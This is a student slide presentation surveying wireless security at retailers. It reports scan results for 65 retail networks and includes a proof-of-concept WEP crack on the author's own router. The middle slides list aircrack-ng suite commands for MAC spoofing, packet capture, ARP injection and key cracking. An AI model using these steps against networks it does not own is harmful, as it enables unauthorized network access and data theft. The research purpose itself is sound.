An Empirical Study on Wireless Network Security for Retailers

Khai Tran

Introduction Retail merchants have been incorporating wireless

solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins. Apple – wireless handheld devices that provided credit

authorization Starbucks – free Wi-Fi access for AT&T customers or

those who wish to pay a fee $3.99 for two hours Home Depot – wireless handheld devices are used

throughout the store to perform inventory, price changes, and various other tasks.

In doing so, some merchants are potentially opening up their doors to unlawful access by hackers who intend to do harm.

Lowe’s and TJX

Lowe’s - 2003 Loosely protected wireless connection in

Southfield, MI branch led to intrusion Trio of hackers (Brian Salcedo, Adam Botbyl, Paul

Timmons) installed “hacking” software and were able to access Lowe’s stores in CA, KS, SD, and other states

TJX - 2005 Two Miami-area Marshalls stores were

compromised due to a breach in their unsecured wireless network

Intruders had access to millions of credit card numbers due to weak data encryption

Purpose

Are Retailers Still Using WEP? Goals:

Scan wireless networks of retailers to determine if networks are secured and what type of security

As a Proof of Concept, setup a personal WLAN and attempt to crack WEP and WPA passwords to determine feasibility of attacks

WEP (Wired Equivalent Privacy) Introduced in 1997 to secure

802.11 wireless networks Several weaknesses detected in

2001 Simple Initialization Vector (IV)

24-bits Repeats after about 5000 packets

Single shared key Susceptible to eavesdropping

Declared by IEEE in 2004 as failing to meet security requirements

WPA/WPA2 (Wifi Protected Access) Introduced in 2003 to replace

WEP IV is increased from 24 to 48 bits

Re-use of keys is unlikely 256 bit keys as opposed to 128

2^128 Implements TKIP (Temporal Key

Integrity Protocol) to support pre-WPA

Tools Used for Passive Scans OCZ Neutrino netbook

Window XP SP3 Intel Atom (N270) 1.60 GHz, 2.0 GB RAM RealTek RTL8187SE Wireless LAN PCIE

WirelessNetView software Created by Nir Sofer Version 1.26 www.nirsoft.net Why was WirelessNetView chosen for passive

scans?

Cities scannedSacramento Citrus HeightsRoseville OrovilleChico

Sample Scan with WirelessNetView

Scan Results 65 retail networks were scanned over a

period of two weeks

Security Less than 17% (11) were still using WEP to secure

their network Of the 17%, only three (0.5%) were Big Box

retailers while all the others were small local retail shops

Most retailers have adopted WPA

No Security Just over 26% (17) had no security on their

network 13 of these 17 were Big Box retailers

What is BackTrack?

Created by Mati Aharoni and Max Moser Supported by Linux community www.remote-exploit.org Live Linux distro based on Slackware and available

as a Live CD or on USB boot Includes tools such as kismet, metasploit, wireshark Used for pen testing, network security and analysis

Tools Used For Cracking Dell Latitude D820

Window XP SP2 Intel Core 2 (T7200) 2.00 GHz, 2.0 GB RAM Intel PRO/Wireless 3945ABG

2Wire 3800HGV-B Uverse Router WEP, WPA, WPA2

BackTrack version 3 airmon-ng airodump-ng aireplay-ng aircrack-ng macchanger

Steps to Cracking WEP Spoof MAC address Turn wireless card into monitoring

mode Scan available networks and capture

packets Inject ARP-request packets into

network to generate traffic Feed data to aircrack-ng for password

cracking

Check Wireless Driver

Spoof MAC

Covering your tracks…

Search Available Networks#airodump-ng wifi0

Capture Packets On Target Network airodump-ng -c 3 -w smacs --bssid 00:21:7C:4E:89:51 wifi0

Inject Packets & Attempt to Crack aireplay-ng -3 –b 00:21:7C:4E:89:51 –h 00:11:22:33:44:55 wifi0 aircrack-ng -b 00:21:7C:4E:89:51 smacs-01.cap

WEP Cracking Demonstration Linksys Wireless-G Router

(WRT54G) SSID - 693TEST MAC – 00:1D:7E:35:AA:6D

Cracking WPA Requires deauthentication from AP and re-authentication

WPA-PSK Cracking Service

www.wpacracker.com

Conclusion

Big Box Retailers Most have either adopted WPA to

secure their network or provided public portals for user authentication

Small & Local Retail Shops A small number are still using WEP

or no security at all

Afterthoughts Residential Wireless Networks

A lot of networks are still using WEP Scan of Nord Ave

182 networks detected 36% (65) are using WEP Out of the 182 networks, 29 are obvious

2WIRE### routers 27 of these are using WEP

2006 survey by A. Bittau, M. Handley, and J. Lackey

400 networks scanned in London 76% WEP, 20% WPA, 4% 802.11i

2,539 networks scanned in Sattle 85% WEP, 14% WPA, 1% 802.11i

2WIRE WEP Networks

Questions?

References Andrea Bittau, Mark Handley, Joshua Lackey, "The Final Nail in WEP?s

Coffin," sp, pp.386-400, 2006 IEEE Symposium on Security and Privacy (S&P'06), 2006.

Highspeed internet access at Starbucks. (2009). Retrieved from http://www.starbucks.com/retail/wireless.asp

Kjell J. Hole, Erlend Dyrnes, Per Thorsheim, "Securing Wi-Fi Networks," Computer, vol. 38, no. 7, pp. 28-34, July 2005, doi:10.1109/MC.2005.241

Carsten Maple, Helen Jacobs, Matthew Reeve, "Choosing the Right Wireless LAN Security Protocol for the Home and Business User," ares, pp.1025-1032, First International Conference on Availability, Reliability and Security (ARES'06), 2006

Carmen Nobel. (November 21, 2005). Home Depot Tackles Network Challenge. Retrieved from http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot-Tackles-Network-Challenge/

Kevin Poulsen. (November 12, 2003). Wireless hacking bust in Michigan. Retrieved from http://www.securityfocus.com/news/7438

Kim Zetter. (October 26, 2007). TJX Failed to Notice Thieves Moving 80-GBytes of Data on its Network. Retrieved from http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/

Kim Zetter. (July 17, 2009). 4 Years After TJX Hack, Payment Industry Sets Security Standards. Retrieved from http://www.wired.com/threatlevel/2009/07/pci/

Songhe Zhao, Charles A. Shoniregun, "Critical Review of Unsecured WEP," services, pp.368-374, 2007 IEEE Congress on Services (Services 2007), 2007

www.nirsoft.net/about_nirsoft_freeware.html http://it.slashdot.org/story/09/12/07/2322235/WPA-PSK-Cracking-As-a-

Service www.aircrack-ng.org